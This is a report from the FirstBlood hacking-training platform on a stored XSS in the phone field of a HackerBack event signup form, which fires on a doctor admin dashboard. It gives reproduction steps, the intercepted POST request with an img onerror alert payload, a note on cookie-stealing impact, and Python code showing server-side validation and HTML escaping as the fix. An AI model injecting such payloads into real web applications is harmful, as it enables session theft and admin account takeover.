FirstBlood-#1010 Stored XSS on doctor admin dashboard
This issue was discovered on FirstBlood v3



On 2022-12-08, properlay (Level 7) reported:

Hello, I found a stored XSS vulnerability on the doctor admin panel.

To reproduce:

  1. Visit https://7b0a93c7239c-properlay.a.firstbloodhackers.com/hackerback.html.

  2. When signing up for the HackerBack event, turn Burp Suite intercept ON.

  3. Fill in the full name and phone number and click sign up.

  4. In the intercepted request, change the phone parameter value to phone=1<img+src=x+onerror=alert(0)>

POST /api/hackerback.php HTTP/1.1
Host: 7b0a93c7239c-properlay.a.firstbloodhackers.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: https://7b0a93c7239c-properlay.a.firstbloodhackers.com
Referer: https://7b0a93c7239c-properlay.a.firstbloodhackers.com/hackerback.html
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

full_name=test&phone=1<img+src=x+onerror=alert(0)>&submit=Signup
  5. Forward the request. The XSS will execute on the admin dashboard.

Impact:

Can take over the doctor admin account by stealing the cookie.

P1 CRITICAL


FirstBlood ID: 59
Vulnerability Type: Stored XSS

It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.
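As an added illustration of the root cause (example code, not FirstBlood's own hackerback.php): the form body from the report is parsed exactly as a server would see it, showing that type="tel" never reaches the server, that a server-side phone check rejects the payload, and that output encoding neutralises it on the admin page even if validation is skipped. The regex, row rendering and function names are assumptions.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample: the signup body from the report. parse_qs decodes '+' to
# a space, so the server sees "1<img src=x onerror=alert(0)>" in the phone field.
SAMPLE_BODY = "full_name=test&phone=1<img+src=x+onerror=alert(0)>&submit=Signup"

# Assumed server-side phone format. The HTML input type="tel" is advisory
# only: browsers do not enforce a format, and an intercepting proxy bypasses
# the form entirely, so the check has to live here.
PHONE_RE = re.compile(r"^\+?[0-9][0-9 ()-]{5,19}$")


def parse_signup(body: str) -> dict:
    """Parse an x-www-form-urlencoded body into a flat name -> value dict."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def validate_phone(phone: str) -> bool:
    return PHONE_RE.fullmatch(phone) is not None


def render_row_vulnerable(name: str, phone: str) -> str:
    # Mirrors the reported behaviour: stored values echoed raw into admin HTML.
    return f"<tr><td>{name}</td><td>{phone}</td></tr>"


def render_row_hardened(name: str, phone: str) -> str:
    # Contextual output encoding for HTML element content (defence in depth,
    # applied regardless of what validation accepted).
    return f"<tr><td>{html.escape(name)}</td><td>{html.escape(phone)}</td></tr>"


def handle_signup(body: str) -> tuple:
    """Return (accepted, admin_row_html): reject bad phones, escape on output."""
    fields = parse_signup(body)
    name, phone = fields.get("full_name", ""), fields.get("phone", "")
    if not validate_phone(phone):
        return False, ""
    return True, render_row_hardened(name, phone)
```

Running handle_signup on SAMPLE_BODY rejects the submission; the vulnerable renderer shows why the unescaped value fires on the dashboard.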

Report Feedback

@zseano

Creator & Administrator


Congratulations, you were the first user to discover this finding, great job!